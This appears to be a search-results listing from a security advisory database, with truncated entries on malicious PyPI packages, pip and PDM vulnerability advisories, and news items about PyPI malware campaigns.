9169 matches found
Malicious code in sparklog (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis fa3ac41199a392a32d649e60da4ff9d98d6ceb0d956297d976ce3b5dc948dc91 The OpenSSF Package Analysis project identified 'sparklog' @ 0.0.3 pypi as malicious. It is considered malicious because: - The package executes...
Malicious code in lyft-exceptions (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 5e0290aaa0cb90a501cb0a0b357f32d3e725f6f3a97541cbc2796671ea4e8f60 The OpenSSF Package Analysis project identified 'lyft-exceptions' @ 5.9.1 pypi as malicious. It is considered malicious because: - The package...
PT-2024-22768 · Unknown +1 · Filecachetools +1
Name of the Vulnerable Software and Affected Versions: Rocket.Chat.Audit through 5ad78e8 Description: The issue arises because Rocket.Chat.Audit depends on filecachetools, which is not available in PyPI. This situation may lead to potential security risks due to the missing dependency...
Malicious code in pyalicet (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 96a6abcd56ea94e027d0d68089a1b6f29312c009aa9be7d80c4b0e33bf0e6396 The OpenSSF Package Analysis project identified 'pyalicet' @ 0.0.3 pypi as malicious. It is considered malicious because: - The package...
Malicious code in djanggo (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 011da0e2a451e787d1c7b54c29f3090de47bd2366de80983667665a70d885320 The OpenSSF Package Analysis project identified 'djanggo' @ 0.0.6 pypi as malicious. It is considered malicious because: - The package...
Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
By Deeba Ahmed FortiGuard Labs latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index PyPI,… This is a post from HackRead.com Read the original post: Crypto Stealing PyPI Malware Hits Both Windows and Linux Users...
Malicious code in richcolor (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 50d5904bd379a75fd43115d7339df3d79f87ec691026774160b15b8632a9f8ae Packages either test the malicious behaviour, or actually download and run a simple remote script during the installation. --- Category: PROBABLYPENTEST -...
Malicious code in excaliburx (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 1d763da65172935a20c3b03c65deff16a2eb251d857d1fc34e4cc67b72f7610a Packages either test the malicious behaviour, or actually download and run a simple remote script during the installation. --- Category: PROBABLYPENTEST -...
Malicious code in enchantv (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 f578b605e73b68aae8c1d8a9bd3f55b810839b2bccd720bccc7f887c2e0046c8 Packages either test the malicious behaviour, or actually download and run a simple remote script during the installation. --- Category: PROBABLYPENTEST -...
Malicious code in yelp-cgeom1 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis f1d368f32894c442f86028103800df96e8818dd226ac82b14b5cec80a267a202 The OpenSSF Package Analysis project identified 'yelp-cgeom1' @ 0.1 pypi as malicious. It is considered malicious because: - The package...
27 Malicious PyPI Packages with Thousands of Downloads Found Targeting IT Experts
An unknown threat actor has been observed publishing typosquat packages to the Python Package Index PyPI repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain. The 27 package...
Moderate: Red Hat Security Advisory: python-pip security update
An update for python-pip is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from...
Moderate: python3.11-pip security update
pip is a package management system used to install and manage software packages written in Python. Many packages can be found in the Python Package Index PyPI. pip is a recursive acronym that can stand for either "Pip Installs Packages" or "Pip Installs Python". Security Fixes: python: tarfile...
SUSE CVE-2023-45805
pdm is a Python package and dependency manager supporting the latest PEP standards. It's possible to craft a malicious pdm.lock file that could allow e.g. an insider or a malicious open source project to appear to depend on a trusted PyPI project, but actually install another project. A project f...
Malicious code in fbdebug (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 2edf3045263e059e2b1599655b25cc167abecc4d1e77e5e7e8d62998b0fd9e18 The OpenSSF Package Analysis project identified 'fbdebug' @ 0.1 pypi as malicious. It is considered malicious because: - The package communicate...
GHSA-J44V-MMF2-XVM9 PDM Trojan Lockfile
Summary It's possible to craft a malicious pdm.lock file that could allow e.g. an insider or a malicious open source project to appear to depend on a trusted PyPI project, but actually install another project. Details Project foo can be targeted by creating the project foo-2 and uploading the fil...
UBUNTU-CVE-2023-45805
pdm is a Python package and dependency manager supporting the latest PEP standards. It's possible to craft a malicious pdm.lock file that could allow e.g. an insider or a malicious open source project to appear to depend on a trusted PyPI project, but actually install another project. A project f...
Malicious code in enumerate-iam-aws (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security 46f8fde812a7274ad1e270e0cc3a8698349365af5d85ee9b89248fa467e5bf2f Attack targeted at users of Alibaba, AWS and Telegram via malicious packages published to PyPI. The malicious code was hidden in strategic...
Malicious code in alibabacloud-oss2 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security d804868504b96ba968b7eae99df63e235a0eaa2eab4a7951ae02c98c614f1828 Attack targeted at users of Alibaba, AWS and Telegram via malicious packages published to PyPI. The malicious code was hidden in strategic...
Malicious code in alisdkcore (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security 456242a426a17eeaca869a5f00ee2f02d837dec5bba7da9240b6bec77c0ae8a8 Attack targeted at users of Alibaba, AWS and Telegram via malicious packages published to PyPI. The malicious code was hidden in strategic...